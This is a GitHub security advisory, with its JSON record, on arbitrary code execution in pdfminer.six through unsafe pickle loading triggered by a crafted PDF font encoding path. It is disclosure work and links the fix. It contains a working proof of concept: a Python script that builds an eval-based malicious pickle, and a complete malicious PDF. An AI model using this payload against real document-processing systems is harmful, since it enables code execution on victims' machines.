ghsa-wf5f-4jwr-ppcp
Vulnerability from github
Published
2025-11-07 20:52
Modified
2025-11-07 20:52
Summary
Arbitrary Code Execution in pdfminer.six via Crafted PDF Input
Details

Summary

pdfminer.six will execute arbitrary code from a malicious pickle file if provided with a malicious PDF file. The CMapDB._load_data() function in pdfminer.six uses pickle.loads() to deserialize pickle files. These pickle files are supposed to be part of the pdfminer.six distribution stored in the cmap/ directory, but a malicious PDF can specify an alternative directory and filename as long as the filename ends in .pickle.gz. A malicious, zipped pickle file can then contain code which will automatically execute when the PDF is processed.

Details

```python

Vulnerable code in pdfminer/cmapdb.py:233-246

def _load_data(cls, name: str) -> Any: name = name.replace("\0", "") # Insufficient sanitization filename = "%s.pickle.gz" % name # ... path construction ... path = os.path.join(directory, filename) # If filename is an absolte path, directory is ignored # ... return type(str(name), (), pickle.loads(gzfile.read())) # Unsafe deserialization ```

An attacker can: 1. Create a malicious PDF with a CMap reference like /malicious 2. Place a malicious pickle file at /malicious.pickle.gz 3. When the PDF is processed, pdfminer loads and deserializes the malicious pickle 4. The pickle deserialization can execute arbitrary Python code

POC

Malicious PDF

Create a PDF with a malicious CMAP entry:

``` 5 0 obj << /Type /Font /Subtype /Type0 /BaseFont /MaliciousFont-Identity-H /Encoding /#2Fpdfs#2Fmalicious /DescendantFonts [6 0 R]

endobj ```

Here the /Encoding points to /pdfs/malicious. Pdfminer will append the extension .pickle.gz to this filename. Place the PDF in a file called /pdfs/malicious.pdf.

Malicious Pickle

Create a malicious, zipped pickle to execute. For example, with this Python script:

```python

!/usr/bin/env python3

import pickle import gzip

def create_demo_pickle(): print("Creating demonstration pickle file...")

# Create payload that executes code AND returns a dict (as pdfminer expects)
class EvilPayload:
    def __reduce__(self):
        # This function will be called during unpickling
        code = "print('Malicious code executed.') or exit(0) or {}"
        return (eval, (code,))

demo_cmap_data = EvilPayload()

# Create the pickle file that the path traversal would access
target_path = "./malicious.pickle.gz"

try:
    with gzip.open(target_path, 'wb') as f:
        pickle.dump(demo_cmap_data, f)
    print(f"✓ Created demonstration pickle file: {target_path}")
    return target_path

except Exception as e:
    print(f"✗ Error creating pickle file: {e}")
    return None

if name == "main": create_demo_pickle() ```

This will create a harmless, zipped pickle file that will display "Malicious code eecuted." then exit when deserialized. Put the file in /pdfs/malicious.pickle.gz.

Test

Install pdfminer.six and run pdf2text.py /pdfs/malicious.pdf. Instead of processing the PDF as normal you should see the output:

$ pdf2txt.py malicious.pdf Malicious code executed!

Impact

If pdfminer.six processes a malicious PDF which points to a zipped pickle file under the control of an attacker the result is arbitrary code execution on the victim's system. An attacker could execute the Python code of their chosing with the permissions of the process running pdfminer.six.

The difficulty in achieving this depends on the OS, see below.

Linux, MacOS - harder to exploit

On Linux-like systems only files on the filesystem can be resolved. An attacker would need to provide the malicious PDF for processing and the malicious pickle file would need to be present on the target system in a location that the attacker already knows, since it needs to be set in the PDF itself. In many cases this will be difficult to exploit because even if the attacker provides both the PDF and the pickle file together, there would be no way to know in advance which full path to the pickle file to specify. In many cases this would make exploitation difficult or impossible. However:

  • An attacker may find a way to write files to a known location on the target system or
  • The system in question may, by design, read files from a known location such as a network share designated for PDF ingestion.

Overall, there is generally less risk on a Linux or Linux-like system.

Windows - easier to exploit

Windows paths can specify network locations e.g. WebDAV, SMB. This means that an attacker could host the malicious pickle remotely and specify a path to the it in the PDF. Since there is no need to get the malicious pickle file on to the target system, exploitation is easier on a Windows OS.

Appendix

A complete, malicious PDF is provided here. A dockerized POC is available upon request.

``` %PDF-1.4 1 0 obj << /Type /Catalog /Pages 2 0 R

endobj

2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1

endobj

3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R /Resources << /Font << /F1 5 0 R

endobj

4 0 obj << /Length 44

stream BT /F1 12 Tf 100 700 Td (Malicious PDF) Tj ET endstream endobj

5 0 obj << /Type /Font /Subtype /Type0 /BaseFont /MaliciousFont-Identity-H /Encoding /#2Fpdfs#2Fmalicious /DescendantFonts [6 0 R]

endobj

6 0 obj << /Type /Font /Subtype /CIDFontType2 /BaseFont /MaliciousFont /CIDSystemInfo << /Registry (Adobe) /Ordering (Identity) /Supplement 0

/FontDescriptor 7 0 R

endobj

7 0 obj << /Type /FontDescriptor /FontName /MaliciousFont /Flags 4 /FontBBox [-1000 -1000 1000 1000] /ItalicAngle 0 /Ascent 1000 /Descent -200 /CapHeight 800 /StemV 80

endobj

xref 0 8 0000000000 65535 f 0000000009 00000 n 0000000058 00000 n 0000000115 00000 n 0000000274 00000 n 0000000370 00000 n 0000000503 00000 n 0000000673 00000 n trailer << /Size 8 /Root 1 0 R

startxref 871 %%EOF ```

Show details on source website


{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "pdfminer.six"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "20251107"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-11-07T20:52:24Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\npdfminer.six will execute arbitrary code from a malicious pickle file if provided with a malicious PDF file. The `CMapDB._load_data()` function in pdfminer.six uses `pickle.loads()` to deserialize pickle files. These pickle files are supposed to be part of the pdfminer.six distribution stored in the `cmap/` directory, but a malicious PDF can specify an alternative directory and filename as long as the filename ends in `.pickle.gz`. A malicious, zipped pickle file can then contain code which will automatically execute when the PDF is processed.\n\n### Details\n\n```python\n# Vulnerable code in pdfminer/cmapdb.py:233-246\ndef _load_data(cls, name: str) -\u003e Any:\n    name = name.replace(\"\\0\", \"\")  # Insufficient sanitization\n    filename = \"%s.pickle.gz\" % name\n    # ... path construction ...\n    path = os.path.join(directory, filename) # If filename is an absolte path, directory is ignored\n    # ...\n    return type(str(name), (), pickle.loads(gzfile.read()))  # Unsafe deserialization\n```\n\nAn attacker can:\n1. Create a malicious PDF with a CMap reference like `/malicious`\n2. Place a malicious pickle file at `/malicious.pickle.gz`\n3. When the PDF is processed, pdfminer loads and deserializes the malicious pickle\n4. The pickle deserialization can execute arbitrary Python code\n\n### POC\n\n#### Malicious PDF\n\nCreate a PDF with a malicious CMAP entry:\n\n```\n5 0 obj\n\u003c\u003c\n/Type /Font\n/Subtype /Type0\n/BaseFont /MaliciousFont-Identity-H\n/Encoding /#2Fpdfs#2Fmalicious\n/DescendantFonts [6 0 R]\n\u003e\u003e\nendobj\n```\n\nHere the /Encoding points to `/pdfs/malicious`. Pdfminer will append the extension `.pickle.gz` to this filename. Place the PDF in a file called `/pdfs/malicious.pdf`.\n\n#### Malicious Pickle\n\nCreate a malicious, zipped pickle to execute. For example, with this Python script:\n\n```python\n#!/usr/bin/env python3\nimport pickle\nimport gzip\n\ndef create_demo_pickle():\n    print(\"Creating demonstration pickle file...\")\n\n    # Create payload that executes code AND returns a dict (as pdfminer expects)\n    class EvilPayload:\n        def __reduce__(self):\n            # This function will be called during unpickling\n            code = \"print(\u0027Malicious code executed.\u0027) or exit(0) or {}\"\n            return (eval, (code,))\n\n    demo_cmap_data = EvilPayload()\n\n    # Create the pickle file that the path traversal would access\n    target_path = \"./malicious.pickle.gz\"\n\n    try:\n        with gzip.open(target_path, \u0027wb\u0027) as f:\n            pickle.dump(demo_cmap_data, f)\n        print(f\"\u2713 Created demonstration pickle file: {target_path}\")\n        return target_path\n\n    except Exception as e:\n        print(f\"\u2717 Error creating pickle file: {e}\")\n        return None\n\nif __name__ == \"__main__\":\n    create_demo_pickle()\n```\n\nThis will create a harmless, zipped pickle file that will display \"Malicious code eecuted.\" then exit when deserialized. Put the file in `/pdfs/malicious.pickle.gz`.\n\n#### Test\n\nInstall pdfminer.six and run `pdf2text.py /pdfs/malicious.pdf`. Instead of processing the PDF as normal you should see the output:\n\n```\n$ pdf2txt.py malicious.pdf\nMalicious code executed!\n```\n\n### Impact\n\nIf pdfminer.six processes a malicious PDF which points to a zipped pickle file under the control of an attacker the result is arbitrary code execution on the victim\u0027s system. An attacker could execute the Python code of their chosing with the permissions of the process running pdfminer.six.\n\nThe difficulty in achieving this depends on the OS, see below.\n\n#### Linux, MacOS - harder to exploit\n\nOn Linux-like systems only files on the filesystem can be resolved. An attacker would need to provide the malicious PDF for processing *and* the malicious pickle file would need to be present on the target system in a location that the attacker already knows, since it needs to be set in the PDF itself. In many cases this will be difficult to exploit because even if the attacker provides both the PDF and the pickle file together, there would be no way to know in advance which full path to the pickle file to specify. In many cases this would make exploitation difficult or impossible. However:\n\n* An attacker may find a way to write files to a known location on the target system or\n* The system in question may, by design, read files from a known location such as a network share designated for PDF ingestion.\n\nOverall, there is generally less risk on a Linux or Linux-like system.\n\n#### Windows - easier to exploit\n\nWindows paths can specify network locations e.g. WebDAV, SMB. This means that an attacker could host the malicious pickle remotely and specify a path to the it in the PDF. Since there is no need to get the malicious pickle file on to the target system, exploitation is easier on a Windows OS.\n\n### Appendix\n\nA complete, malicious PDF is provided here. A dockerized POC is available upon request.\n\n```\n%PDF-1.4\n1 0 obj\n\u003c\u003c\n/Type /Catalog\n/Pages 2 0 R\n\u003e\u003e\nendobj\n\n2 0 obj\n\u003c\u003c\n/Type /Pages\n/Kids [3 0 R]\n/Count 1\n\u003e\u003e\nendobj\n\n3 0 obj\n\u003c\u003c\n/Type /Page\n/Parent 2 0 R\n/MediaBox [0 0 612 792]\n/Contents 4 0 R\n/Resources\n\u003c\u003c\n/Font\n\u003c\u003c\n/F1 5 0 R\n\u003e\u003e\n\u003e\u003e\n\u003e\u003e\nendobj\n\n4 0 obj\n\u003c\u003c\n/Length 44\n\u003e\u003e\nstream\nBT\n/F1 12 Tf\n100 700 Td\n(Malicious PDF) Tj\nET\nendstream\nendobj\n\n5 0 obj\n\u003c\u003c\n/Type /Font\n/Subtype /Type0\n/BaseFont /MaliciousFont-Identity-H\n/Encoding /#2Fpdfs#2Fmalicious\n/DescendantFonts [6 0 R]\n\u003e\u003e\nendobj\n\n6 0 obj\n\u003c\u003c\n/Type /Font\n/Subtype /CIDFontType2\n/BaseFont /MaliciousFont\n/CIDSystemInfo\n\u003c\u003c\n/Registry (Adobe)\n/Ordering (Identity)\n/Supplement 0\n\u003e\u003e\n/FontDescriptor 7 0 R\n\u003e\u003e\nendobj\n\n7 0 obj\n\u003c\u003c\n/Type /FontDescriptor\n/FontName /MaliciousFont\n/Flags 4\n/FontBBox [-1000 -1000 1000 1000]\n/ItalicAngle 0\n/Ascent 1000\n/Descent -200\n/CapHeight 800\n/StemV 80\n\u003e\u003e\nendobj\n\nxref\n0 8\n0000000000 65535 f\n0000000009 00000 n\n0000000058 00000 n\n0000000115 00000 n\n0000000274 00000 n\n0000000370 00000 n\n0000000503 00000 n\n0000000673 00000 n\ntrailer\n\u003c\u003c\n/Size 8\n/Root 1 0 R\n\u003e\u003e\nstartxref\n871\n%%EOF\n```",
  "id": "GHSA-wf5f-4jwr-ppcp",
  "modified": "2025-11-07T20:52:24Z",
  "published": "2025-11-07T20:52:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pdfminer/pdfminer.six/security/advisories/GHSA-wf5f-4jwr-ppcp"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pdfminer/pdfminer.six/commit/b808ee05dd7f0c8ea8ec34bdf394d40e63501086"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pdfminer/pdfminer.six"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Arbitrary Code Execution in pdfminer.six via Crafted PDF Input"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.


Loading…

Loading…